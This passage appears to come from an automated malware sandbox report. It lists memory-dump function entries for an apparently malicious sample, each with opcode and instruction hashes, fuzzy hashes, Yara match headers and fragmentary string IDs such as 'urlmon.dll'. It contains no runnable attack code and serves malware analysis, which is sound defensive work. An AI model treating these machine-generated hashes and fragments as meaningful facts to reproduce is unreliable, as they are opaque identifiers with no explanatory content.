                                                • Opcode Fuzzy Hash: e96378fa17382bedff40c33f1e0709699db874266609bc1f1b938e2e6b777b70
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$%A$.$.^$/$5?$6$$7$;$@$A*$F$G$H:$I$K$Q$T9$U$VW$_;$g$lP$v$w$x$z${V$&$O$e
                                                • API String ID: 0-4103389139
                                                • Opcode ID: 055161716c9ee853759cc350a9cbc1408be8c11c8f6ca3284437e516e451e5e0
                                                • Instruction ID: 0cb500e693fc9f9e3f816de8f9f185270741f6e139c6947cc705bff1b15c398c
                                                • Opcode Fuzzy Hash: 055161716c9ee853759cc350a9cbc1408be8c11c8f6ca3284437e516e451e5e0
                                                • Instruction Fuzzy Hash: C4B134B0C05769CBEB60CF41C9987DEBAB5BB45308F1081D9C15C7B291CBBA0A89CF81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$%A$.$.^$/$5?$6$$7$;$@$A*$F$G$H:$I$K$Q$T9$U$VW$_;$g$lP$v$w$x$z${V$&$O$e
                                                • API String ID: 0-4103389139
                                                • Opcode ID: d89d11c5c9ca647fb5b86502987c7f474ffd387b0d9594930872f74c09fc39f5
                                                • Instruction ID: be51eab3c34ba6f5157bbe3068de45f7a0cbdb1ecc7a735681c37ccb3c381bc7
                                                • Opcode Fuzzy Hash: d89d11c5c9ca647fb5b86502987c7f474ffd387b0d9594930872f74c09fc39f5
                                                • Instruction Fuzzy Hash: 92B124B0C05769CBEB61CF41C9987DEBAB5BB45308F5081D9C15C7B291CBBA0A89CF91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                • API String ID: 0-1002149817
                                                • Opcode ID: a5edf542b2afa331abcc1caf250d9b626b885a277746a6464f4da482ef592e5b
                                                • Instruction ID: fcdc698d7646a3432497fa712ecbad925fabdcb7452a4ed8f1ce30a12d6efd93
                                                • Opcode Fuzzy Hash: a5edf542b2afa331abcc1caf250d9b626b885a277746a6464f4da482ef592e5b
                                                • Instruction Fuzzy Hash: 4DC12FB5C013689EDB65DFA4CC84BEEBBB9EF45304F0085D9E508AB241E7B54A88CF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: b8be667ac8ff53ac8def6cc512bef9c8edc87df79d86641a3ac06ce7ca91e795
                                                • Instruction ID: a031c25f55e8567b6c5f9f2a34b819df629d0c411bbd4cc659f89aef7f0e39a0
                                                • Opcode Fuzzy Hash: b8be667ac8ff53ac8def6cc512bef9c8edc87df79d86641a3ac06ce7ca91e795
                                                • Instruction Fuzzy Hash: 767161B6C00728AADB65DFD4CC81FEEB77DAF48701F044199E509BA150EB705B988FA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: faa3d45abe6a70efc9646c8722388b0cc527ac957f45957b1b84a17c319ac86c
                                                • Instruction ID: d6229bf52f391c757658d0c6d080a2850382e2b1fce1ddc00f1df2dbd160506e
                                                • Opcode Fuzzy Hash: faa3d45abe6a70efc9646c8722388b0cc527ac957f45957b1b84a17c319ac86c
                                                • Instruction Fuzzy Hash: F46161B5C00728AADB55DFA4CC81FEEBB7DAF48701F044199E509BA150EB705B98CFA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                • API String ID: 0-685823316
                                                • Opcode ID: 35c7cebd99f23caf5f91fd7b75d314528b3c6719823d9fbd3298e603691639a5
                                                • Instruction ID: 9c0c0188fe9f261b6bb8d724c37370a08c7bc9bfcc3fae42b4a35c5da694c3fd
                                                • Opcode Fuzzy Hash: 35c7cebd99f23caf5f91fd7b75d314528b3c6719823d9fbd3298e603691639a5
                                                • Instruction Fuzzy Hash: 5A31B3B5D40318AEEB14DF90CC84BEEBBB9BF08700F04814DE608BA180DBB556488BA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$P$e$i$m$o$r$x
                                                • API String ID: 0-620024284
                                                • Opcode ID: 2f0c5fdfc23d950d38afd1a209873d8d6d6d86bbf34c28cf487e2aae4cc24fe8
                                                • Instruction ID: d909e8e9f133e1236cf6281e4ba9fa6fd661dd728f54b53ba0e6fdad418bdf58
                                                • Opcode Fuzzy Hash: 2f0c5fdfc23d950d38afd1a209873d8d6d6d86bbf34c28cf487e2aae4cc24fe8
                                                • Instruction Fuzzy Hash: 334177B6C003287ADB25DBA0DC80FDE777DAF55300F0085D9A909AB141EBB557998FA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 3e19424aac13bcbdfd14f0e090490bbd961040568682d9be9b97f13943ae6f52
                                                • Instruction ID: 71ebf605afa171761cc213cd54c88ab0ca141716555a652bac1dd8765b0caefd
                                                • Opcode Fuzzy Hash: 3e19424aac13bcbdfd14f0e090490bbd961040568682d9be9b97f13943ae6f52
                                                • Instruction Fuzzy Hash: 25417676C0422CAADF14DFA8DCC4BEFBBB9BF49310F05415AE909A7100E77159458B94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: F$P$T$f$r$x
                                                • API String ID: 0-2523166886
                                                • Opcode ID: 85a5e242a1f861712ff28912f88f61daffa588b072cf4fffbd4dfea16e177e72
                                                • Instruction ID: 51fea028f52bb879b1f473277447fa7b49474f7ab6d6fb1d7b075827b1378faf
                                                • Opcode Fuzzy Hash: 85a5e242a1f861712ff28912f88f61daffa588b072cf4fffbd4dfea16e177e72
                                                • Instruction Fuzzy Hash: 4A510671D00315AEE738DFA4CC94BEAF7F8EF06310F044659E5095A180DBB4A594CBE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$1$?$A$G$m
                                                • API String ID: 0-849330469
                                                • Opcode ID: 51aeca661fb4a5f42f9f241bb1458c69b7ff72f6b563887085c294449dbcf931
                                                • Instruction ID: 73808edebdd40098dc5551223425ee1f71e8fa476add56510a3ff6aa3b3f2234
                                                • Opcode Fuzzy Hash: 51aeca661fb4a5f42f9f241bb1458c69b7ff72f6b563887085c294449dbcf931
                                                • Instruction Fuzzy Hash: 4C11D010D0C7CEDDDB12CABC84486ADBF755F13224F0883D9D5A52B2D2D2794746C7A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $i$l$o$u
                                                • API String ID: 0-2051669658
                                                • Opcode ID: 7d97bc2e228f3eee062e53d856fa2b298b011ecacd539c90672b9f3e90762185
                                                • Instruction ID: 693693cab1e323c258da2be5b5982a7f38f493f54f7956fd84d4634fa81a01ff
                                                • Opcode Fuzzy Hash: 7d97bc2e228f3eee062e53d856fa2b298b011ecacd539c90672b9f3e90762185